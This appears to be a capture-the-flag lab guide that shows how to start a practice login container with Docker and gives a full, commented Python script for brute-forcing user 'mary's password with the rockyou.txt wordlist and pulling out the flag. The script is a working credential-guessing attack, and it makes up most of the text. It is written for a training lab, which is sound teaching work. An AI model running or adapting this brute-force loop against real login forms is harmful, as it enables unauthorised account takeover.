
docker run -d -p 9898:80 --restart always --name brute-login joshbeck2024/brute_login_ctf
Use something like Python requests to brute-force the password field.
Running through rockyou.txt is a snap with the Python Requests library. This is a good script to keep on hand if you aren’t familiar with it.
# Import the requests library so we can send HTTP requests (like a browser)
import requests
# Import sys so we can safely exit the program when needed
import sys
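# =====================
# Configuration section
# =====================
# URL of the lab login form the script posts to. Port 9898 is the host port
# published by the `docker run -p 9898:80` command for the CTF container.
# The value must be a bare URL: the angle brackets left over from a markdown
# autolink ("<http://...>") are not part of it and make requests reject the
# URL before anything is sent.
URL = "http://sem2ctf.icsi.cyber:9898/"
# Username we are trying to log in as
USERNAME = "mary"
# File that contains a list of possible passwords (one per line)
WORDLIST_FILE = "rockyou.txt"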
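def solve():
    """
    Try each password in WORDLIST_FILE against the lab login form at URL.

    For every non-empty line of the wordlist, one POST is sent with the form
    fields "email" (USERNAME) and "pass" (the candidate). A response body
    containing "Flag-" is treated as a successful login: the flag text is
    printed and the function returns. If the wordlist is exhausted without a
    match, a "not found" message is printed.

    Exits the process with status 1 if the wordlist file is missing, if an
    HTTP request fails, or if the user presses CTRL+C.

    NOTE(review): a sequential run like this only succeeds while the login
    form accepts unlimited attempts; whether the lab image enforces any
    lockout or rate limit is not visible here. The loop also produces a
    steady stream of failed POSTs for one account from one client, which is
    the pattern failed-login monitoring is meant to catch.
    """
    # Print basic info so the user knows what is happening
    print(f"[*] Attacking {URL} with user '{USERNAME}'...")
    print(f"[*] Using wordlist: {WORDLIST_FILE}")

    try:
        # errors="ignore" drops undecodable bytes from a line instead of
        # raising UnicodeDecodeError; the rest of the line is still used.
        with open(WORDLIST_FILE, "r", errors="ignore") as f:
            for password in f:
                # Remove surrounding whitespace, including the newline
                password = password.strip()
                # Skip empty lines
                if not password:
                    continue

                # Show which password we are currently trying
                print(f"[*] Trying password: {password}")

                # Submit the login form
                response = requests.post(
                    URL,
                    data={
                        "email": USERNAME,  # form field for username/email
                        "pass": password,   # form field for password
                    },
                    timeout=5,  # stop waiting if the server takes too long
                )

                # "Flag-" in the body is the success indicator for this lab
                if "Flag-" in response.text:
                    print(f"[+] Success! Password found: {password}")
                    # The flag runs from "Flag-" up to the next HTML tag,
                    # or to the end of the body if no tag follows.
                    start_index = response.text.find("Flag-")
                    end_index = response.text.find("<", start_index)
                    if end_index == -1:
                        end_index = len(response.text)
                    flag = response.text[start_index:end_index].strip()
                    print(f"[+] Flag: {flag}")
                    # Stop the function once we succeed
                    return
                else:
                    # Password was incorrect
                    print("[-] Incorrect.")
    except FileNotFoundError:
        # The wordlist file does not exist
        print(f"[!] Wordlist not found: {WORDLIST_FILE}")
        sys.exit(1)
    except requests.RequestException as exc:
        # Connection errors and the 5-second timeout land here. Exit rather
        # than continue, so a candidate is never silently skipped and the
        # run does not end in a raw traceback.
        print(f"[!] Request failed: {exc}")
        sys.exit(1)
    except KeyboardInterrupt:
        # The user pressed CTRL+C. "\n" is a real newline here; the doubled
        # backslash printed a literal "\n" in front of the message.
        print("\n[!] Interrupted by user.")
        sys.exit(1)

    # Reached only if no password in the wordlist worked
    print("[-] Password not found in wordlist.")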
# Entry point: start the attempt loop only when this file is executed as a
# script, so importing it from another module has no side effects.
if __name__ == "__main__":
    solve()